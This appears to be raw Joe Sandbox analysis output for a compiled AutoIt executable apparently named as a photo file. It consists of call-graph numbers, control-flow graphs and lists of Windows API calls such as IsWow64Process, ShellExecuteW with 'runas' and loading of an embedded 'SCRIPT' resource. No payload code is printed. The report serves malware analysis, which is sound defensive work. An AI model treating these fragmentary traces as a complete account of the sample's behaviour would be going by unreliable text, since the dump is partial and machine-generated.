92300->92205 92301->92212 92302->92156 92304 d1b42b 92303->92304 92305 d1b3be 92303->92305 92310 d2e3db SetFilePointerEx 92304->92310 92307 d1ae95 92305->92307 92308 d1b3fc ReadFile 92305->92308 92307->92261 92308->92307 92309 d1b416 92308->92309 92309->92305 92309->92307 92310->92305 92311->92291 92313 d15d0d 92312->92313 92321 d15e2a 92312->92321 92314 d2fd8b 22 API calls 92313->92314 92313->92321 92315 d15d34 92314->92315 92316 d2fd8b 22 API calls 92315->92316 92322 d15da9 92316->92322 92318 d15e82 22 API calls 92318->92322 92320 d1bd9d 22 API calls 92320->92322 92321->91583 92322->92318 92322->92320 92322->92321 92325 d1b7e0 92322->92325 92352 d80977 22 API calls 92322->92352 92323->91586 92324->91588 92326 d17c18 22 API calls 92325->92326 92337 d1b805 92326->92337 92327 d1ba28 92328 d1bd9d 22 API calls 92327->92328 92329 d1ba42 92328->92329 92329->92322 92332 d6036d __fread_nolock 92335 d6039f 92332->92335 92346 d1bd03 92332->92346 92333 d1bd9d 22 API calls 92333->92337 92334 d60312 92342 d2fd5b 22 API calls 92334->92342 92357 d79600 84 API calls __wsopen_s 92335->92357 92337->92327 92337->92332 92337->92333 92337->92334 92337->92335 92339 d1bfbf 22 API calls 92337->92339 92337->92346 92348 d1be83 22 API calls 92337->92348 92349 d1c7c9 22 API calls 92337->92349 92353 d14df1 41 API calls _wcslen 92337->92353 92354 d1bf6f 22 API calls 92337->92354 92355 d150f7 23 API calls 92337->92355 92356 d151ec 22 API calls __fread_nolock 92337->92356 92339->92337 92341 d603ad 92343 d1bd9d 22 API calls 92341->92343 92344 d60333 92342->92344 92345 d603c3 92343->92345 92347 d2fd8b 22 API calls 92344->92347 92345->92329 92346->92329 92358 d79600 84 API calls __wsopen_s 92346->92358 92347->92332 92348->92337 92351 d1b9f9 CharUpperBuffW 92349->92351 92351->92337 92352->92322 92353->92337 92354->92337 92355->92337 92356->92337 92357->92341 92358->92329 92359->91598 92360 d11098 92365 d1615e 92360->92365 92364 d110a7 92366 d1c25d 22 API calls 92365->92366 92367 d16175 GetVersionExW 92366->92367 92368 d184e7 22 API calls 92367->92368 92369 d161c2 92368->92369 92370 d1ad22 22 API calls 92369->92370 92372 d161f8 92369->92372 92371 d161ec 92370->92371 92374 d1562b 22 API calls 92371->92374 92373 d1629b GetCurrentProcess IsWow64Process 92372->92373 92378 d54516 92372->92378 92375 d162b7 92373->92375 92374->92372 92376 d5455b GetSystemInfo 92375->92376 92377 d162cf LoadLibraryA 92375->92377 92379 d162e0 GetProcAddress 92377->92379 92380 d1631c GetSystemInfo 92377->92380 92379->92380 92381 d162f0 GetNativeSystemInfo 92379->92381 92382 d162f6 92380->92382 92381->92382 92383 d1109d 92382->92383 92384 d162fa FreeLibrary 92382->92384 92385 d30023 29 API calls __onexit 92383->92385 92384->92383 92385->92364 92386 d1105b 92391 d1533e 92386->92391 92388 d1106a 92422 d30023 29 API calls __onexit 92388->92422 92390 d11074 92392 d1534e __wsopen_s 92391->92392 92393 d1c25d 22 API calls 92392->92393 92394 d15404 92393->92394 92395 d158e5 24 API calls 92394->92395 92396 d1540d 92395->92396 92423 d14d82 92396->92423 92399 d152b7 22 API calls 92400 d15426 92399->92400 92401 d16aff 22 API calls 92400->92401 92402 d15435 92401->92402 92403 d1c25d 22 API calls 92402->92403 92404 d1543e 92403->92404 92405 d1bfbf 22 API calls 92404->92405 92406 d15447 RegOpenKeyExW 92405->92406 92407 d53ed5 RegQueryValueExW 92406->92407 92411 d15469 92406->92411 92408 d53ef2 92407->92408 92409 d53f6b RegCloseKey 92407->92409 92410 d2fd8b 22 API calls 92408->92410 92409->92411 92419 d53f7d _wcslen 92409->92419 92412 d53f0b 92410->92412 92411->92388 92413 d170c2 22 API calls 92412->92413 92414 d53f16 RegQueryValueExW 92413->92414 92416 d53f33 92414->92416 92418 d53f4d ISource 92414->92418 92415 d1660f 22 API calls 92415->92419 92417 d184e7 22 API calls 92416->92417 92417->92418 92418->92409 92419->92411 92419->92415 92420 d1b606 22 API calls 92419->92420 92421 d16aff 22 API calls 92419->92421 92420->92419 92421->92419 92422->92390 92424 d51ef0 __wsopen_s 92423->92424 92425 d14d8f GetFullPathNameW 92424->92425 92426 d14db1 92425->92426 92427 d184e7 22 API calls 92426->92427 92428 d14dcf 92427->92428 92428->92399 92429 d6461c 92433 d80fde 92429->92433 92431 d64627 92432 d80fde 53 API calls 92431->92432 92432->92431 92435 d80feb 92433->92435 92443 d81018 92433->92443 92434 d8101a 92468 d2f9a5 53 API calls 92434->92468 92435->92434 92437 d8101f 92435->92437 92441 d81012 92435->92441 92435->92443 92444 d18e90 92437->92444 92440 d17cf8 22 API calls 92440->92443 92467 d1cb70 39 API calls 92441->92467 92443->92431 92445 d18ea5 92444->92445 92462 d18ea2 92444->92462 92446 d18edb 92445->92446 92447 d18ead 92445->92447 92449 d55be5 92446->92449 92450 d18eed 92446->92450 92458 d55ccc 92446->92458 92469 d35156 26 API calls 92447->92469 92454 d55c5e 92449->92454 92461 d2fd8b 22 API calls 92449->92461 92470 d2faa3 51 API calls 92450->92470 92451 d18ebd 92457 d2fd5b 22 API calls 92451->92457 92471 d2faa3 51 API calls 92454->92471 92455 d55ce4 92455->92455 92459 d18ec7 92457->92459 92472 d35113 26 API calls 92458->92472 92460 d1b606 22 API calls 92459->92460 92460->92462 92463 d55c2e 92461->92463 92462->92440 92464 d2fd5b 22 API calls 92463->92464 92465 d55c55 92464->92465 92466 d1b606 22 API calls 92465->92466 92466->92454 92467->92443 92468->92437 92469->92451 92470->92451 92471->92458 92472->92455 92473 d210bf 92474 d210d3 92473->92474 92475 d215b6 92473->92475 92477 d215c2 92474->92477 92478 d2fd5b 22 API calls 92474->92478 92547 d1c5e7 23 API calls ISource 92475->92547 92548 d1c5e7 23 API calls ISource 92477->92548 92480 d210e5 92478->92480 92480->92477 92481 d2113e 92480->92481 92482 d2163d 92480->92482 92490 d2069d ISource 92481->92490 92494 d22c10 92481->92494 92549 d81073 22 API calls 92482->92549 92485 d652e7 92550 d834ba 82 API calls __wsopen_s 92485->92550 92487 d2fd5b 22 API calls 92493 d205f4 ISource 92487->92493 92488 d657f5 92489 d651db 92489->92490 92492 d1c1c3 22 API calls 92489->92492 92491 d1c1c3 22 API calls 92491->92493 92492->92490 92493->92485 92493->92487 92493->92489 92493->92490 92493->92491 92495 d230b0 92494->92495 92496 d22c76 92494->92496 92621 d301c2 5 API calls __Init_thread_wait 92495->92621 92498 d22c90 92496->92498 92499 d66f0c 92496->92499 92502 d23220 9 API calls 92498->92502 92626 d96fc3 164 API calls 92499->92626 92501 d230ba 92504 d230fb 92501->92504 92506 d1b606 22 API calls 92501->92506 92505 d22ca0 92502->92505 92503 d66f18 92503->92493 92509 d66f21 92504->92509 92511 d2312c 92504->92511 92507 d23220 9 API calls 92505->92507 92515 d230d4 92506->92515 92508 d22cb6 92507->92508 92508->92504 92510 d22cec 92508->92510 92627 d834ba 82 API calls __wsopen_s 92509->92627 92510->92509 92516 d22d08 __fread_nolock 92510->92516 92623 d1c5e7 23 API calls ISource 92511->92623 92514 d23139 92624 d2d993 95 API calls 92514->92624 92622 d30178 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 92515->92622 92516->92514 92518 d66f49 92516->92518 92527 d2fd5b 22 API calls 92516->92527 92528 d2fd8b 22 API calls 92516->92528 92534 d22e2f 92516->92534 92537 d66f8d 92516->92537 92541 d22ec7 ISource 92516->92541 92628 d834ba 82 API calls __wsopen_s 92518->92628 92521 d23172 92625 d2fa6d 23 API calls 92521->92625 92522 d66fac 92630 d9566c 54 API calls _wcslen 92522->92630 92523 d22e3c 92524 d23220 9 API calls 92523->92524 92526 d22e49 92524->92526 92531 d23220 9 API calls 92526->92531 92526->92541 92527->92516 92528->92516 92530 d2301d 92530->92493 92536 d22e63 92531->92536 92533 d22f7b ISource 92533->92530 92620 d2d593 22 API calls ISource 92533->92620 92534->92522 92534->92523 92540 d1c1c3 22 API calls 92536->92540 92536->92541 92629 d834ba 82 API calls __wsopen_s 92537->92629 92538 d23220 9 API calls 92538->92541 92540->92541 92541->92521 92541->92533 92541->92538 92546 d17bee CloseHandle 92541->92546 92551 d994b2 92541->92551 92554 d8f013 92541->92554 92561 d87368 92541->92561 92617 d882f8 92541->92617 92631 d834ba 82 API calls __wsopen_s 92541->92631 92546->92541 92547->92477 92548->92482 92549->92490 92550->92488 92632 d97e80 92551->92632 92553 d994c2 92553->92541 92555 d18e90 53 API calls 92554->92555 92556 d8f04d 92555->92556 92557 d1b7e0 86 API calls 92556->92557 92558 d8f05d 92557->92558 92560 d8f086 92558->92560 92723 d1b5c1 22 API calls 92558->92723 92560->92541 92562 d87392 92561->92562 92563 d87387 92561->92563 92565 d87472 92562->92565 92567 d1c25d 22 API calls 92562->92567 92724 d1ce67 39 API calls 92563->92724 92566 d2fd5b 22 API calls 92565->92566 92615 d875c2 92565->92615 92568 d874a5 92566->92568 92569 d873b3 92567->92569 92570 d2fd8b 22 API calls 92568->92570 92571 d1c25d 22 API calls 92569->92571 92572 d874b6 92570->92572 92573 d873bc 92571->92573 92574 d17bee CloseHandle 92572->92574 92575 d18e90 53 API calls 92573->92575 92576 d874c1 92574->92576 92577 d873c8 92575->92577 92578 d1c25d 22 API calls 92576->92578 92725 d16bff 22 API calls 92577->92725 92580 d874c9 92578->92580 92582 d17bee CloseHandle 92580->92582 92581 d873dd 92583 d17cf8 22 API calls 92581->92583 92584 d874d0 92582->92584 92585 d87410 92583->92585 92586 d18e90 53 API calls 92584->92586 92587 d87468 92585->92587 92726 d7d3ec lstrlenW GetFileAttributesW FindFirstFileW FindClose 92585->92726 92588 d874dc 92586->92588 92728 d1ce67 39 API calls 92587->92728 92589 d17bee CloseHandle 92588->92589 92591 d874e6 92589->92591 92595 d170e5 5 API calls 92591->92595 92593 d87420 92593->92587 92594 d87424 92593->92594 92596 d1b606 22 API calls 92594->92596 92597 d87500 92595->92597 92598 d87431 92596->92598 92600 d87508 92597->92600 92601 d875fc GetLastError 92597->92601 92727 d7d1df 26 API calls 92598->92727 92729 d16d7e 27 API calls ISource 92600->92729 92602 d87615 92601->92602 92732 d17bbe CloseHandle ISource 92602->92732 92605 d8743a 92605->92587 92606 d87516 92730 d16d67 SetFilePointerEx SetFilePointerEx SetFilePointerEx 92606->92730 92608 d87563 92610 d2fd5b 22 API calls 92608->92610 92609 d8751d 92609->92608 92612 d7cc1d 4 API calls 92609->92612 92611 d87597 92610->92611 92613 d1c25d 22 API calls 92611->92613 92612->92608 92614 d875a4 92613->92614 92614->92615 92731 d740c5 22 API calls __fread_nolock 92614->92731 92615->92541 92733 d89801 92617->92733 92619 d88308 92619->92541 92620->92533 92621->92501 92622->92504 92623->92514 92624->92521 92625->92521 92626->92503 92627->92541 92628->92541 92629->92541 92630->92536 92631->92541 92633 d18e90 53 API calls 92632->92633 92634 d97eb7 92633->92634 92657 d97efc ISource 92634->92657 92670 d98bfa 92634->92670 92636 d981a8 92637 d98376 92636->92637 92641 d981b6 92636->92641 92709 d98e0b 60 API calls 92637->92709 92640 d98385 92640->92641 92642 d98391 92640->92642 92683 d97dad 92641->92683 92642->92657 92643 d18e90 53 API calls 92659 d97f70 92643->92659 92648 d981ef 92698 d2fbf0 92648->92698 92651 d98229 92654 d17d93 22 API calls 92651->92654 92652 d9820f 92704 d834ba 82 API calls __wsopen_s 92652->92704 92656 d98238 92654->92656 92655 d9821a GetCurrentProcess TerminateProcess 92655->92651 92658 d183e0 22 API calls 92656->92658 92657->92553 92660 d98251 92658->92660 92659->92636 92659->92643 92659->92657 92702 d740c5 22 API calls __fread_nolock 92659->92702 92703 d98444 42 API calls _strftime 92659->92703 92669 d98279 92660->92669 92705 d21df0 22 API calls 92660->92705 92662 d983ec 92662->92657 92666 d98400 FreeLibrary 92662->92666 92663 d98268 92706 d98aa2 75 API calls 92663->92706 92666->92657 92669->92662 92707 d21df0 22 API calls 92669->92707 92708 d1c5e7 23 API calls ISource 92669->92708 92710 d98aa2 75 API calls 92669->92710 92671 d1c7c9 22 API calls 92670->92671 92672 d98c15 CharLowerBuffW 92671->92672 92711 d78daa 92672->92711 92676 d1c25d 22 API calls 92677 d98c51 92676->92677 92718 d186ac 22 API calls __fread_nolock 92677->92718 92679 d98c65 92681 d1ad22 22 API calls 92679->92681 92680 d98d85 _wcslen 92680->92659 92682 d98c6f _wcslen 92681->92682 92682->92680 92719 d98444 42 API calls _strftime 92682->92719 92684 d97dc8 92683->92684 92685 d97e13 92683->92685 92686 d2fd8b 22 API calls 92684->92686 92689 d98fbd 92685->92689 92687 d97dea 92686->92687 92687->92685 92688 d2fd5b 22 API calls 92687->92688 92688->92687 92690 d991d2 ISource 92689->92690 92697 d98fe1 _strcat _wcslen 92689->92697 92690->92648 92691 d1cc8f 39 API calls 92691->92697 92692 d1ce67 39 API calls 92692->92697 92693 d1cfb5 39 API calls 92693->92697 92694 d18e90 53 API calls 92694->92697 92695 d3e99c 21 API calls ___std_exception_copy 92695->92697 92697->92690 92697->92691 92697->92692 92697->92693 92697->92694 92697->92695 92722 d7eecc 24 API calls _wcslen 92697->92722 92699 d2fc05 92698->92699 92700 d2fc9d VirtualProtect 92699->92700 92701 d2fc6b 92699->92701 92700->92701 92701->92651 92701->92652 92702->92659 92703->92659 92704->92655 92705->92663 92706->92669 92707->92669 92708->92669 92709->92640 92710->92669 92713 d78dca _wcslen 92711->92713 92712 d78eb9 92712->92676 92712->92682 92713->92712 92714 d78dff 92713->92714 92715 d78ebe 92713->92715 92714->92712 92720 d2d5dc 41 API calls 92714->92720 92715->92712 92721 d2d5dc 41 API calls 92715->92721 92718->92679 92719->92680 92720->92714 92721->92715 92722->92697 92723->92560 92724->92562 92725->92581 92726->92593 92727->92605 92728->92565 92729->92606 92730->92609 92731->92615 92732->92615 92734 d89820 92733->92734 92735 d89906 92733->92735 92737 d2fd5b 22 API calls 92734->92737 92791 d89bc8 39 API calls 92735->92791 92738 d89827 92737->92738 92740 d2fd8b 22 API calls 92738->92740 92739 d898e8 92739->92619 92741 d89838 92740->92741 92743 d17bee CloseHandle 92741->92743 92742 d899e3 92784 d81db4 92742->92784 92745 d89843 92743->92745 92746 d1c25d 22 API calls 92745->92746 92749 d8984b 92746->92749 92747 d899ea 92754 d7cc1d 4 API calls 92747->92754 92748 d898c0 92748->92739 92748->92742 92750 d89951 92748->92750 92751 d17bee CloseHandle 92749->92751 92752 d18e90 53 API calls 92750->92752 92753 d89852 92751->92753 92757 d89958 92752->92757 92755 d18e90 53 API calls 92753->92755 92778 d899c6 92754->92778 92759 d8985e 92755->92759 92756 d899d9 92793 d7cc75 30 API calls 92756->92793 92757->92756 92775 d8998c 92757->92775 92760 d17bee CloseHandle 92759->92760 92763 d89868 92760->92763 92761 d17c18 22 API calls 92764 d8999c 92761->92764 92762 d17bee CloseHandle 92765 d89a3c 92762->92765 92766 d170e5 5 API calls 92763->92766 92767 d899ac 92764->92767 92770 d1c1c3 22 API calls 92764->92770 92794 d17bbe CloseHandle ISource 92765->92794 92769 d89877 92766->92769 92771 d152b7 22 API calls 92767->92771 92772 d8987b 92769->92772 92773 d898e0 92769->92773 92770->92767 92774 d899ba 92771->92774 92788 d16d7e 27 API calls ISource 92772->92788 92790 d17bbe CloseHandle ISource 92773->92790 92792 d7cc75 30 API calls 92774->92792 92775->92761 92778->92739 92778->92762 92780 d89889 92789 d16d67 SetFilePointerEx SetFilePointerEx SetFilePointerEx 92780->92789 92782 d89890 92782->92748 92783 d7cc1d 4 API calls 92782->92783 92783->92748 92785 d81dbd 92784->92785 92786 d81dc2 92784->92786 92795 d80e85 24 API calls __fread_nolock 92785->92795 92786->92747 92788->92780 92789->92782 92790->92739 92791->92748 92792->92778 92793->92778 92794->92739 92795->92786 92796 d635db 92797 d1f0b0 ISource 92796->92797 92798 d1f2d5 92797->92798 92799 d1f411 PeekMessageW 92797->92799 92800 d1f107 GetInputState 92797->92800 92801 d62899 TranslateAcceleratorW 92797->92801 92803 d1f48f PeekMessageW 92797->92803 92804 d1f304 timeGetTime 92797->92804 92805 d1f473 TranslateMessage DispatchMessageW 92797->92805 92806 d1f4af Sleep 92797->92806 92807 d6374f Sleep 92797->92807 92808 d629b5 timeGetTime 92797->92808 92824 d22c10 164 API calls 92797->92824 92827 d1f650 92797->92827 92834 d1f8d0 92797->92834 92855 d2ed18 IsDialogMessageW GetClassLongW 92797->92855 92857 d83948 23 API calls 92797->92857 92858 d834ba 82 API calls __wsopen_s 92797->92858 92799->92797 92800->92797 92800->92799 92801->92797 92803->92797 92804->92797 92805->92803 92825 d1f4c0 92806->92825 92807->92825 92856 d125c1 23 API calls 92808->92856 92809 d2e465 timeGetTime 92809->92825 92812 d637e6 GetExitCodeProcess 92814 d63812 CloseHandle 92812->92814 92815 d637fc WaitForSingleObject 92812->92815 92813 d6331d 92818 d63325 92813->92818 92814->92825 92815->92797 92815->92814 92816 da28f2 GetForegroundWindow 92816->92825 92819 d63884 Sleep 92819->92797 92824->92797 92825->92797 92825->92809 92825->92812 92825->92813 92825->92816 92825->92819 92859 d9557f 23 API calls 92825->92859 92860 d7e899 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 92825->92860 92861 d7d3fa 47 API calls 92825->92861 92828 d1f66f 92827->92828 92830 d1f683 92827->92830 92862 d1eb60 164 API calls 2 library calls 92828->92862 92863 d834ba 82 API calls __wsopen_s 92830->92863 92831 d1f67a 92831->92797 92833 d63b50 92833->92833 92835 d1f910 92834->92835 92853 d1f9dc ISource 92835->92853 92865 d301c2 5 API calls __Init_thread_wait 92835->92865 92838 d63ba5 92840 d1c25d 22 API calls 92838->92840 92838->92853 92839 d1c25d 22 API calls 92839->92853 92843 d63bbf 92840->92843 92841 d1c117 41 API calls 92841->92853 92866 d30023 29 API calls __onexit 92843->92866 92846 d63bc9 92867 d30178 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 92846->92867 92848 d1c1c3 22 API calls 92848->92853 92849 d21df0 22 API calls 92849->92853 92850 d1fce1 92850->92797 92853->92839 92853->92841 92853->92848 92853->92849 92853->92850 92854 d834ba 82 API calls 92853->92854 92864 d11d5f 94 API calls 92853->92864 92868 d301c2 5 API calls __Init_thread_wait 92853->92868 92869 d30023 29 API calls __onexit 92853->92869 92870 d30178 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 92853->92870 92871 d967e8 95 API calls 92853->92871 92854->92853 92855->92797 92856->92797 92857->92797 92858->92797 92859->92825 92860->92825 92861->92825 92862->92831 92863->92833 92864->92853 92865->92838 92866->92846 92867->92853 92868->92853 92869->92853 92870->92853 92871->92853

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 234 d1615e-d161cd call d1c25d GetVersionExW call d184e7 239 d161d3 234->239 240 d5434e-d54361 234->240 241 d161d5-d161d7 239->241 242 d54362-d54366 240->242 245 d5438d 241->245 246 d161dd-d1623c call d1ad22 call d1562b 241->246 243 d54369-d54375 242->243 244 d54368 242->244 243->242 247 d54377-d54379 243->247 244->243 250 d54394-d54397 245->250 263 d54516-d5451d 246->263 264 d16242-d16244 246->264 247->241 249 d5437f-d54386 247->249 249->240 252 d54388 249->252 253 d5439d-d543df 250->253 254 d1629b-d162b5 GetCurrentProcess IsWow64Process 250->254 252->245 253->254 258 d543e5-d543e8 253->258 256 d16314-d1631a 254->256 257 d162b7 254->257 260 d162bd-d162c9 256->260 257->260 261 d54412-d5441c 258->261 262 d543ea-d543f4 258->262 265 d5455b-d5455f GetSystemInfo 260->265 266 d162cf-d162de LoadLibraryA 260->266 270 d5442f-d54439 261->270 271 d5441e-d5442a 261->271 267 d543f6-d543fc 262->267 268 d54401-d5440d 262->268 272 d5453d-d54540 263->272 273 d5451f 263->273 264->250 269 d1624a-d1625d 264->269 279 d162e0-d162ee GetProcAddress 266->279 280 d1631c-d16326 GetSystemInfo 266->280 267->254 268->254 281 d16263-d16265 269->281 282 d5445d-d54466 269->282 275 d5444c-d54458 270->275 276 d5443b-d54447 270->276 271->254 277 d54542-d54551 272->277 278 d5452b-d54533 272->278 274 d54525 273->274 274->278 275->254 276->254 277->274 287 d54553-d54559 277->287 278->272 279->280 288 d162f0-d162f4 GetNativeSystemInfo 279->288 289 d162f6-d162f8 280->289 283 d54484-d54499 281->283 284 d1626b-d1626e 281->284 285 d54473-d5447f 282->285 286 d54468-d5446e 282->286 292 d544a6-d544b2 283->292 293 d5449b-d544a1 283->293 290 d16274-d1628f 284->290 291 d544c8-d544cb 284->291 285->254 286->254 287->278 288->289 294 d16301-d16313 289->294 295 d162fa-d162fb FreeLibrary 289->295 296 d544b7-d544c3 290->296 297 d16295 290->297 291->254 298 d544d1-d544f8 291->298 292->254 293->254 295->294 296->254 297->254 299 d54505-d54511 298->299 300 d544fa-d54500 298->300 299->254 300->254
                                                                      APIs
                                                                      • GetVersionExW.KERNEL32(?), ref: 00D1618D
                                                                        • Part of subcall function 00D184E7: _wcslen.LIBCMT ref: 00D184FA
                                                                      • GetCurrentProcess.KERNEL32(?,00DAD030,00000000,?,?), ref: 00D162A2
                                                                      • IsWow64Process.KERNEL32(00000000,?,?), ref: 00D162A9
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00D162D4
                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00D162E6
                                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00D162F4
                                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 00D162FB
                                                                      • GetSystemInfo.KERNEL32(?,?,?), ref: 00D16320
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                      • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                      • API String ID: 3290436268-3101561225
                                                                      • Opcode ID: 2b1978ad2d558e055f5c8c0409100fc08c0c2d644e975042b399dab252ed9441
                                                                      • Instruction ID: fdafbbf9e9ff508ffc0996a15495e8ddd177c94f92cffac82e3d4f6dc7765b70
                                                                      • Opcode Fuzzy Hash: 2b1978ad2d558e055f5c8c0409100fc08c0c2d644e975042b399dab252ed9441
                                                                      • Instruction Fuzzy Hash: 4DA1A939B0A3D0DFCB11EBA97CC45D97F947B66305B085899E881DBB22D631858CCB36

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00D136D8,?), ref: 00D1448D
                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00D136D8,?), ref: 00D144A0
                                                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,PO,00DE1400,?,?,?,?,?,?,00D136D8,?), ref: 00D14515
                                                                        • Part of subcall function 00D184E7: _wcslen.LIBCMT ref: 00D184FA
                                                                        • Part of subcall function 00D136FB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00D1453D,PO,?,?,?,?,?,?,?,00D136D8,?), ref: 00D1373C
                                                                      • SetCurrentDirectoryW.KERNEL32(?,00000001,PO,?,?,?,?,?,?,?,00D136D8,?), ref: 00D14596
                                                                      • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00DD59B8,00000010), ref: 00D5371C
                                                                      • SetCurrentDirectoryW.KERNEL32(?,PO,?,?,?,?,?,?,?,00D136D8,?), ref: 00D53769
                                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00DD2244,PO,?,?,?,?,?,?,?,00D136D8), ref: 00D537F2
                                                                      • ShellExecuteW.SHELL32(00000000,?,?), ref: 00D537F9
                                                                        • Part of subcall function 00D145AE: GetSysColorBrush.USER32(0000000F), ref: 00D145B9
                                                                        • Part of subcall function 00D145AE: LoadCursorW.USER32(00000000,00007F00), ref: 00D145C8
                                                                        • Part of subcall function 00D145AE: LoadIconW.USER32(00000063), ref: 00D145DE
                                                                        • Part of subcall function 00D145AE: LoadIconW.USER32(000000A4), ref: 00D145F0
                                                                        • Part of subcall function 00D145AE: LoadIconW.USER32(000000A2), ref: 00D14602
                                                                        • Part of subcall function 00D145AE: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00D1461A
                                                                        • Part of subcall function 00D145AE: RegisterClassExW.USER32(?), ref: 00D1466B
                                                                        • Part of subcall function 00D1468E: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D146BC
                                                                        • Part of subcall function 00D1468E: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D146DD
                                                                        • Part of subcall function 00D1468E: ShowWindow.USER32(00000000,?,?,?,?,?,?,00D136D8,?), ref: 00D146F1
                                                                        • Part of subcall function 00D1468E: ShowWindow.USER32(00000000,?,?,?,?,?,?,00D136D8,?), ref: 00D146FA
                                                                        • Part of subcall function 00D156C2: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D15793
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                      • String ID: PO$This is a third-party compiled AutoIt script.$runas
                                                                      • API String ID: 683915450-1573828211
                                                                      • Opcode ID: e8c13005786e87a816a3dad0aa73f90527a43136eed6b1800c6cce616f434e13
                                                                      • Instruction ID: 841d6cef6f89a98d1952970ee72c46fb0e10355356012c4aaa79e4cddce90167
                                                                      • Opcode Fuzzy Hash: e8c13005786e87a816a3dad0aa73f90527a43136eed6b1800c6cce616f434e13
                                                                      • Instruction Fuzzy Hash: CD51C275208381BADB11BF61FC519FE7BA9DB95750F48042DF881863A2DE3489898B72

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 619 d16122-d1613a CreateStreamOnHGlobal 620 d1615a-d1615d 619->620 621 d1613c-d16153 FindResourceExW 619->621 622 d542f1-d54300 LoadResource 621->622 623 d16159 621->623 622->623 624 d54306-d54314 SizeofResource 622->624 623->620 624->623 625 d5431a-d54325 LockResource 624->625 625->623 626 d5432b-d54333 625->626 627 d54337-d54349 626->627 627->623
                                                                      APIs
                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00D16A4A,?,?,00000000,00000000), ref: 00D16132
                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00D16A4A,?,?,00000000,00000000), ref: 00D16149
                                                                      • LoadResource.KERNEL32(?,00000000,?,?,00D16A4A,?,?,00000000,00000000,?,?,?,?,?,?,00D168C2), ref: 00D542F5
                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,00D16A4A,?,?,00000000,00000000,?,?,?,?,?,?,00D168C2), ref: 00D5430A
                                                                      • LockResource.KERNEL32(00D16A4A,?,?,00D16A4A,?,?,00000000,00000000,?,?,?,?,?,?,00D168C2,?), ref: 00D5431D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
